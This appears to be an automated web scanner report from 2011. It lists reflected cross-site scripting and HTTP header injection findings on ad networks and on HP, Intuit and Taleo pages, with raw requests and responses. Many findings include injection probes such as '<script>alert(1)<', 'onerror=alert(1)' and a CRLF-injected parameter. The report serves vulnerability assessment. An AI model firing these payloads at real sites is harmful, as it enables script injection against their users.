1.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
2. Cross-site scripting (reflected)
2.1. http://a.collective-media.net/ad/cm.womensforum/ [REST URL parameter 1]
2.2. http://a.collective-media.net/adj/cm.womensforum/ [REST URL parameter 2]
2.4. http://a.collective-media.net/adj/cm.womensforum/ [sz parameter]
2.5. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_adid parameter]
2.6. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_id parameter]
2.7. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_uuid parameter]
2.8. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [redirect parameter]
2.9. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [sz parameter]
2.10. http://ds.addthis.com/red/psi/sites/www.icfi.com/p.json [callback parameter]
2.11. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$bg parameter]
2.12. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$dt parameter]
2.17. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/scp_dt [$sid parameter]
2.19. http://ib.adnxs.com/ptj [redir parameter]
2.22. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [cshtstate parameter]
2.23. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [focusOnField parameter]
2.24. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlISWLDMessage parameter]
2.25. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlajaxid parameter]
2.26. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlcallback parameter]
2.27. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlcompid parameter]
2.28. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [initialHistory parameter]
2.29. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [jobCartIcon parameter]
2.30. https://icfi.taleo.net/careersection/icf_prof_ext/moresearch.ftl [jobCartIcon parameter]
2.31. https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl [cshtstate parameter]
2.32. https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl [ftlstate parameter]
2.33. http://k.collective-media.net/cmadj/cm.womensforum/ [REST URL parameter 2]
2.34. https://login.quickbooks.com/j/qbn/auth/employee [REST URL parameter 3]
2.35. http://mbox.offermatica.intuit.com/m2/intuit/mbox/standard [mbox parameter]
2.36. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]
2.37. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]
2.38. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]
2.39. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]
2.40. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]
2.41. http://quickbooks.intuit.com/ [name of an arbitrarily supplied request parameter]
2.43. http://quickbooks.intuit.com/pro/ [name of an arbitrarily supplied request parameter]
2.47. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter]
2.48. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter]
2.49. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter]
2.50. http://s7d2.scene7.com/is/image/HPShopping/xx096av_01_10 [REST URL parameter 4]
2.51. http://s7d2.scene7.com/is/image/HPShopping/xx096av_03_10 [REST URL parameter 4]
2.52. http://s7d2.scene7.com/is/image/HPShopping/xx096av_05_30 [REST URL parameter 4]
2.53. http://s7d2.scene7.com/is/image/HPShopping/xx096av_06_10 [REST URL parameter 4]
2.54. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [callback parameter]
2.55. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [container parameter]
2.56. http://www.highbeam.com/ControlLoader.aspx [ControlName parameter]
2.57. http://www.highbeam.com/iframead/display.aspx [id parameter]
2.58. http://www.highbeam.com/iframead/display.aspx [kvps parameter]
2.59. http://www.highbeam.com/iframead/display.aspx [zone parameter]
2.60. http://www.shopping.hp.com/webapp/shopping/computer_can_series.do [jumpid parameter]
2.61. http://www.shopping.hp.com/webapp/shopping/cto.do [can_params parameter]
2.62. http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter]
2.63. http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter]
2.64. http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter]
2.65. http://www.shopping.hp.com/webapp/shopping/series_can.do [jumpid parameter]
2.66. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]
2.67. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]
2.69. http://payments.intuit.com/ [Referer HTTP header]
2.70. http://payments.intuit.com/ [Referer HTTP header]
2.71. http://payments.intuit.com/ [Referer HTTP header]
2.72. http://payments.intuit.com/apply-now/ [Referer HTTP header]
2.73. http://payments.intuit.com/apply-now/ [Referer HTTP header]
2.74. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]
2.75. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]
2.76. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]
2.77. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]
2.78. http://payments.intuit.com/products/ [Referer HTTP header]
2.79. http://payments.intuit.com/products/ [Referer HTTP header]
2.80. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]
2.81. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]
2.86. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]
2.87. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]
2.96. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]
2.97. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]
2.98. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]
2.99. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]
2.100. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]
2.101. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]
2.104. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]
2.105. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]
2.106. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]
2.107. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]
2.124. http://payments.intuit.com/support/ [Referer HTTP header]
2.125. http://payments.intuit.com/support/ [Referer HTTP header]
2.126. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]
2.127. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]
2.128. http://www.highbeam.com/doc/1P2-675451.html [Referer HTTP header]
2.129. http://k.collective-media.net/cmadj/cm.womensforum/ [cli cookie]
2.130. http://payments.intuit.com/ [abTestGroup cookie]
2.131. http://payments.intuit.com/ [abTestGroup cookie]
2.132. http://payments.intuit.com/apply-now/ [abTestGroup cookie]
2.133. http://payments.intuit.com/apply-now/ [abTestGroup cookie]
2.134. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]
2.135. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]
2.136. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]
2.137. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]
2.138. http://payments.intuit.com/products/ [abTestGroup cookie]
2.139. http://payments.intuit.com/products/ [abTestGroup cookie]
2.140. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]
2.141. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]
2.146. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]
2.147. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]
2.156. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]
2.157. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]
2.158. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]
2.159. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]
2.160. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]
2.161. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]
2.164. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]
2.165. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]
2.166. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]
2.167. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]
2.168. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]
2.169. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]
2.184. http://payments.intuit.com/support/ [abTestGroup cookie]
2.185. http://payments.intuit.com/support/ [abTestGroup cookie]
2.186. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]
2.187. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]
2.188. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [meld_sess cookie]
2.189. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]
2.190. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]
2.191. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]
Severity: | High |
Confidence: | Certain |
Host: | http://network.realmedia |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW801i4doAAvyI; S247=3SHMdODZXwiULLq |
HTTP/1.1 302 Found Date: Mon, 21 Mar 2011 15:54:08 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: NXCLICK2=011Q1hQmNX_TRACK 57ddbfb6291!y$eh+NX_TRACK_Hpdirect Location: http://imagen01 Content-Length: 345 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://imagen01 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://network.realmedia |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW801i4doAAvyI; S247=3SHMdODZXwiULLq |
HTTP/1.1 302 Found Date: Mon, 21 Mar 2011 15:50:06 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: NXCLICK2=011Q1hMsNX_TRACK feccff905e6!yd..*NX_TRACK_Hpdirect Location: http://imagen01 Content-Length: 345 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://imagen01 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=AJS&si=2b8d1%0d%0a01d57f54f74&pi=L&xs=1&pu=http%253A/ Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D69B03E6E651A4 |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:47:59 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Mon, 21 Mar 2011 17:02:59 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZs Set-Cookie: ANRTT=60174^1^1300913115 Set-Cookie: Tsid=0^1300725652 01d57f54f74^1300726079^1300727879; path=/; expires=Mon, 21-Mar-11 17:17:59 GMT; domain=tacoda.at.atwola Set-Cookie: TData=99999|^|61674|60489 Set-Cookie: N=2:73be88250e5d4a2e Set-Cookie: ATTAC=a3ZzZWc9OTk5OT Set-Cookie: eadx=2; path=/; expires=Tue, 20-Mar-12 16:47:59 GMT; domain=tacoda.at.atwola Cteonnt-Length: 312 Content-Type: application/x-javascript Content-Length: 312 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|61674|60489 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /ad/cm.womensforum/ |
GET /ad391e9<script>alert(1)< Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 109 Vary: Accept-Encoding Date: Mon, 21 Mar 2011 16:42:20 GMT Connection: close unknown path /ad391e9<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.womensforum/ |
GET /adj/cm.womensforuma1efd'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 444 Date: Mon, 21 Mar 2011 16:42:17 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.womensforum/ |
GET /adj/cm.womensforum/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 448 Vary: Accept-Encoding Date: Mon, 21 Mar 2011 16:42:17 GMT Connection: close Set-Cookie: dc=dal-dc-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.womensforum/ |
GET /adj/cm.womensforum/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 445 Vary: Accept-Encoding Date: Mon, 21 Mar 2011 16:42:17 GMT Connection: close Set-Cookie: dc=dal-dc-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N553.mediamath |
GET /adj/N553.mediamath Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 21 Mar 2011 16:41:38 GMT Vary: Accept-Encoding Expires: Mon, 21 Mar 2011 16:41:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 521 document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N553.mediamath |
GET /adj/N553.mediamath Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 21 Mar 2011 16:41:33 GMT Vary: Accept-Encoding Expires: Mon, 21 Mar 2011 16:41:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 521 document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N553.mediamath |
GET /adj/N553.mediamath Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 21 Mar 2011 16:41:42 GMT Vary: Accept-Encoding Expires: Mon, 21 Mar 2011 16:41:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 521 document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N553.mediamath |
GET /adj/N553.mediamath Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 521 Cache-Control: no-cache Pragma: no-cache Date: Mon, 21 Mar 2011 16:41:46 GMT Expires: Mon, 21 Mar 2011 16:41:46 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N553.mediamath |
GET /adj/N553.mediamath Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 21 Mar 2011 16:41:29 GMT Vary: Accept-Encoding Expires: Mon, 21 Mar 2011 16:41:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 521 document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ds.addthis.com |
Path: | /red/psi/sites/www.icfi |
GET /red/psi/sites/www.icfi Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 21 Mar 2011 16:30:32 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 20 Apr 2011 16:30:32 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 21 Mar 2011 16:30:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 16:30:32 GMT Connection: close _ate.ad.hpr169b9<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 86 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:11 GMT Date: Mon, 21 Mar 2011 15:50:11 GMT Connection: close Unable to find /HPShopping/HPShopping |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 86 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:12 GMT Date: Mon, 21 Mar 2011 15:50:12 GMT Connection: close Unable to find /HPShopping/is{HPShopping |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 99 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:15 GMT Date: Mon, 21 Mar 2011 15:50:15 GMT Connection: close Unable to find /HPShopping/is{HPShopping |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 86 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:14 GMT Date: Mon, 21 Mar 2011 15:50:14 GMT Connection: close Unable to find /HPShopping/is{HPShopping |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 82 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:15 GMT Date: Mon, 21 Mar 2011 15:50:15 GMT Connection: close Unable to find /HPShopping/promo3_tile1e809<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 100 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:11 GMT Date: Mon, 21 Mar 2011 15:50:11 GMT Connection: close Unable to find /HPShopping/is{HPShopping |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 104 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:12 GMT Date: Mon, 21 Mar 2011 15:50:12 GMT Connection: close Unable to find /HPShopping/is{HPShopping |
Severity: | High |
Confidence: | Certain |
Host: | http://hpshopping |
Path: | /s7d2.scene7.com/is/image |
